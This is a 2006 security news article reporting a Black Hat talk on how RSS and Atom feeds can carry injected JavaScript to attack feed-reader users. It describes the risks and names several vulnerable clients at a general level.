RSS, Atom feeds ripe for attack

Black Hat: A researcher demonstrates how RSS and Atom feeds can spread the payload of a zero-day attack. His advice? Subscribe to feeds with care.

LAS VEGAS -- A researcher at Black Hat USA 2006 had a warning for those who subscribe to a growing selection of RSS and Atom feeds: If a Web site is susceptible to a zero-day attack, then its feeds -- and its feed recipients -- may be as well.

Robert Auger, a security engineer for Atlanta-based SPI Dynamics Inc., explained that if a Web site offering RSS and Atom feeds becomes infected with malicious code, not only can its feeds spread the attack, but also attackers can create their own malicious feeds that seem legitimate.

Therefore, he said, subscribers must assume all feed data is malicious -- even data from trusted feeds to which an end-user may already subscribe -- and take the necessary security precautions.

Black Hat USA 2006

Check out SearchSecurity.com's special coverage of Black Hat USA 2006 as reporters from SearchSecurity.com and Information Security magazine post the latest news and tidbits from Las Vegas.
"You only have to hack a couple of sites' [feeds] and you can hurt a lot of users," Auger said.

Expanding on his presentation description on the Black Hat Web site, Auger said many RSS clients fail to properly vet the data they receive, failing to guard against malicious and malformed content.

Auger said that as a test he created several feeds and injected JavaScript into some, then observed the effects. He found it's possible to conduct a number of malicious activities, including log keystrokes, steal cookies and launch cross-site scripting attacks.

He noted that many RSS feeds are automatically generated from content originating in third-party feeds, search engine results and other areas, which means feed subscribers can be victimized even if they don't actually subscribe to a feed that's been specifically tainted.

Auger said that as more people use feeds to view news summaries, watch movies, read blogs and download music files, the bad guys have a growing playground from which to launch bots and worms.

An increasing number of electronic publishers have begun offering RSS and Atom feeds as the technology's popularity has grown. The PEW Internet & American Life Project has estimated that as much as 9% of the U.S. Internet population uses feeds, while New York-based JupiterResearch has said that number could be as high as 12%.

In conducting its research, SPI Dynamics found Bloglines, RSS Reader, RSS Owl, FeedDemon and SharpReader to be among those vulnerable to attack. Auger noted Bloglines fixed its vulnerability immediately after they were made aware of it.

Auger said he plans to conduct further research into how the feed threat affects P2P applications, podcast clients and DVRs like TiVo. For now, he said, users should be careful when subscribing to RSS and Atom feeds.

"When you get data, you can't assume it's good," Auger said. When choosing to subscribe to a feed, "you have to consider its potential impact and where the data is coming from."

Dig deeper on Web Services Security and SOA Security

Pro+

Features

Enjoy the benefits of Pro+ membership, learn more and join.

0 comments

Oldest 

Forgot Password?

No problem! Submit your e-mail address below. We'll send you an email containing your password.

Your password has been sent to:

SearchCloudSecurity

SearchNetworking

SearchCIO

SearchConsumerization

SearchEnterpriseDesktop

SearchCloudComputing

ComputerWeekly

Close